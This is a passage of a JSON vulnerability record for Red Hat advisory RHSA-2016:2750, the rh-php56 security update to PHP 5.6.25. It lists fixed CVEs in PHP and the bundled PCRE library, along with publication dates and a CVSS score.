"CVE-2016-6289", "CVE-2016-6290", "CVE-2016-6291", "CVE-2016-6292", "CVE-2016-6294", "CVE-2016-6295", "CVE-2016-6296", "CVE-2016-6297", "CVE-2016-7124", "CVE-2016-7125", "CVE-2016-7126", "CVE-2016-7127", "CVE-2016-7128", "CVE-2016-7129", "CVE-2016-7130", "CVE-2016-7131", "CVE-2016-7132"], "description": "PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server. The rh-php56 packages provide a recent stable release of PHP with PEAR 1.9.5 and enhanced language features including constant expressions, variadic functions, arguments unpacking, and the interactive debuger. The memcache, mongo, and XDebug extensions are also included.\n\nThe rh-php56 Software Collection has been upgraded to version 5.6.25, which provides a number of bug fixes and enhancements over the previous version. (BZ#1356157, BZ#1365401)\n\nSecurity Fixes in the rh-php56-php component:\n\n* Several Moderate and Low impact security issues were found in PHP. Under certain circumstances, these issues could cause PHP to crash, disclose portions of its memory, execute arbitrary code, or impact PHP application integrity. Space precludes documenting each of these issues in this advisory. Refer to the CVE links in the References section for a description of each of these vulnerabilities. (CVE-2013-7456, CVE-2014-9767, CVE-2015-8835, CVE-2015-8865, CVE-2015-8866, CVE-2015-8867, CVE-2015-8873, CVE-2015-8874, CVE-2015-8876, CVE-2015-8877, CVE-2015-8879, CVE-2016-1903, CVE-2016-2554, CVE-2016-3074, CVE-2016-3141, CVE-2016-3142, CVE-2016-4070, CVE-2016-4071, CVE-2016-4072, CVE-2016-4073, CVE-2016-4342, CVE-2016-4343, CVE-2016-4473, CVE-2016-4537, CVE-2016-4538, CVE-2016-4539, CVE-2016-4540, CVE-2016-4541, CVE-2016-4542, CVE-2016-4543, CVE-2016-4544, CVE-2016-5093, CVE-2016-5094, CVE-2016-5096, CVE-2016-5114, CVE-2016-5399, CVE-2016-5766, CVE-2016-5767, CVE-2016-5768, CVE-2016-5770, CVE-2016-5771, CVE-2016-5772, CVE-2016-5773, CVE-2016-6128, CVE-2016-6207, CVE-2016-6288, CVE-2016-6289, CVE-2016-6290, CVE-2016-6291, CVE-2016-6292, CVE-2016-6294, CVE-2016-6295, CVE-2016-6296, CVE-2016-6297, CVE-2016-7124, CVE-2016-7125, CVE-2016-7126, CVE-2016-7127, CVE-2016-7128, CVE-2016-7129, CVE-2016-7130, CVE-2016-7131, CVE-2016-7132)\n\n* Multiple flaws were found in the PCRE library included with the rh-php56-php packages for Red Hat Enterprise Linux 6. A specially crafted regular expression could cause PHP to crash or, possibly, execute arbitrary code. (CVE-2015-2325, CVE-2015-2326, CVE-2015-2327, CVE-2015-2328, CVE-2015-3210, CVE-2015-3217, CVE-2015-5073, CVE-2015-8381, CVE-2015-8383, CVE-2015-8384, CVE-2015-8385, CVE-2015-8386, CVE-2015-8388, CVE-2015-8391, CVE-2015-8392, CVE-2015-8395)\n\nRed Hat would like to thank Hans Jerry Illikainen for reporting CVE-2016-3074, CVE-2016-4473, and CVE-2016-5399.", "modified": "2018-06-13T01:28:23", "published": "2016-11-15T16:13:31", "id": "RHSA-2016:2750", "href": "https://access.redhat.com/errata/RHSA-2016:2750", "type": "redhat", "title": "(RHSA-2016:2750) Moderate: rh-php56 security, bug fix, and enhancement update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}